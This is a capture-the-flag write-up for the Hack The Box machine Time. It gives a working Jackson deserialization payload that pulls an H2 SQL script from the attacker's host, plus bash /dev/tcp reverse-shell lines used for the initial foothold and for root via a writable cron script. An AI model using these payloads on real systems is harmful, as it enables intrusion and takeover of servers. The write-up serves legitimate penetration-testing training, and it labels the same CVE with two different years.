Post

Hack The Box Write-Up Time - 10.10.10.214

You’re waiting for a train. A train that’ll take you far away. You know where you hope this train will take you. But you can’t know for sure. Yet it doesn’t matter. Now, tell me why?

Cobb

About Time

In this post, I’m writing a write-up for the machine Time from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Time is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

After the port scan with Nmap, I discovered two open ports: 22/tcp (SSH), and 80/tcp (HTTP). I started with the enumeration of the web service is running a website with a JSON beautifier. After some testing, the website returns a Java error message, which reveals a vulnerability. After some searching on the internet, I find that this website is vulnerable to a Remote Code Execution, known as CVE-2020-12384. After exploiting this vulnerability I could establish a reverse shell to my machine.

User

After exploiting the CVE-2020-12384 vulnerability I had a Reverse Shell as the user pericles. There was nothing more to do than only capture the user-flag.

Root

The enumeration script linpeas.sh discovered the file /usr/bin/timer\_backup.sh. This file is running as root and is making a back-up of the location /var/www/html to /root/backup.zip. The user account pericles had no privileges to modify this file, but with the echo command, I was able to insert a reverse shell command in the timer\_backup.sh and the cronjob is running this script, and the reverse shell as root is established. Grabbing the root password is the last step to root this box.

Machine Info

Hack-The-Box-Time-Write-Up-by-T13nn3s

Hack-The-Box-Time-Machine-IP-and-makers

Recon

Port scan with Nmap

As always, I start the machine with a Nmap port scan.

1
nmap -sV -sC -oA ./nmap/10.10.10.214 10.10.10.214

The results.

1
2
3
4
5
6
7
8
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.78 seconds

This machine has two open ports. 22/tcp (SSH) and 80/tcp (HTTP), with the HTTP title Online JSON parser. Let’s start to enumerate web service.

Enumeration

Enumaration Web Server

I visited the website on the URL http://10.10.10.214. I end up on a webpage with an online JSON beautifier and validator.

http://10.10.10.214

In the dropdown menu I got two options: Beautify and Validate (beta!). When I fill in a random string on Beautify, I get the response null, when I full in a random JSON formatted text, it got’s beautified. Ok, that looks logical. When I capture the response with Burp, nothing odd yet.

When I enter a random string with the Validate (beta!) option in the dropdown menu, the response is very odd.

Validation failed

The error message:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

It’s a JSON-validator, why do I receive an ‘Unhandled Java exception’ message? It the back-end using Java, I think it is. Only I think this error message should never have reached the front-end. A search on the internet leads me to CVE-2019-12384 vulnerability.

Exploitation

CVE-2019-12384

In fact, this is a Server-Side Request Forgery (SSRF) vulnerability that leads to a Remote Code Execution (RCE). The context can be found in this article: Jackson gadgets Anatomy of a vulnerability. It’s a deserialization vulnerability. Deserialization is a process when a string got’s converted back to its original JSON-object, there is an explanation here: What is deserialize and serialize in JSON?

I have changed the payload a bit, from Ruby to actual JSON, to get it working through the website.

1
2
3
4
5
6
[
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
    {
        "url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.23:8000/inject.sql'"
    }
]

On my attacker machine, I created a folder with the name http and added the file inject.sql in that folder with a Reverse shell payload.

1
2
3
4
5
6
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"')

Let’s start the exploit by filling in the ‘JSON payload’ in the textbox area and click on Process. If everything is working well, the page keeps loading, because that means that the payload got’s executed.

Hack-The-Box-Time-exploit-CVE-2019-12384

The payload with the reverse shell payload, is being downloaded.

1
2
3
time/http$ python -m SimpleHTTPServer 8000 
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.214 - - [09/Nov/2020 21:14:42] "GET /inject.sql HTTP/1.1" 200 -

The reverse shell is established.

1
2
3
4
5
6
~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
Connection from 10.10.10.214:49514
bash: cannot set terminal process group (910): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ 

Let’s upgrade the shell and check as which user I’m logged in right now.

1
2
3
4
5
6
7
8
9
pericles@time:/var/www/html$ which python3
which python3
/usr/bin/python3
pericles@time:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
pericles@time:/var/www/html$ whoami
whoami
pericles
pericles@time:/var/www/html$

Well, here is no flag here. Let’s move to the user home folder an grab the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pericles@time:/var/www/html$ cat user.txt
cat user.txt
cat: user.txt: No such file or directory
pericles@time:/var/www/html$ ls 
ls
css  fonts  images  index.php  js  vendor
pericles@time:/var/www/html$ cd /home
cd /home
pericles@time:/home$ ls
ls
pericles
pericles@time:/home$ cd pericles
cd pericles
pericles@time:/home/pericles$ cat user.txt
cat user.txt
b65621cd7cb8ed20a14f8ac8d376d63b
pericles@time:/home/pericles$

Got the flag. Net step: Privilege Escalation.

Privilege Escalation

Enumeration

After downloading linpeas.sh to the machine and run it, it has found something interesting: a bash-script named timer_backup.sh. As the name of this box is Time, it’s no coincidence. Output from linpeas.sh:

1
2
3
4
[+] Interesting GROUP writable files (not in Home) (max 500)                                                                                                                             
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files                                                                                                           
  Group pericles:                                                                                                                                                                        
/usr/bin/timer_backup.sh 

Let’s read the file.

1
cat /usr/bin/timer_backup.sh
1
2
3
4
5
6
pericles@time:/home/pericles$ c
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/home/pericles$

This file is compressing everything in location '/var/www/html' in the file named 'website.bak.zip' and move it to the location '/root/backup.zip'. This file is writing to the root directory, so it has to be running as root. I could try check it with pspy, but let just modify the file, but I do not have the permission. 

Own Time (on time)

After som thinking. Why not echo’ing into the file? I’ve started a netcat listener on port 5555.

1
pericles@time:/usr/bin$ echo "bash -i >& /dev/tcp/10.10.14.23/5555 0>&1" > timer_backup.sh

Bam! Reverse shell established and directly gone! This box is called Time. So, after some tries and grab quickly the root flag.

1
2
3
4
5
6
7
Connection from 10.10.10.214:54776
bash: cannot set terminal process group (46667): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# whoami
root@time:/# cat /root/root.txt
cat /root/root.txt
3e56626bc8ef0b4495e9952eb4bc3ca4

Did you liked this write-up? Please consider to spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856.

Happy hacking!

This post is licensed under CC BY 4.0 by the author.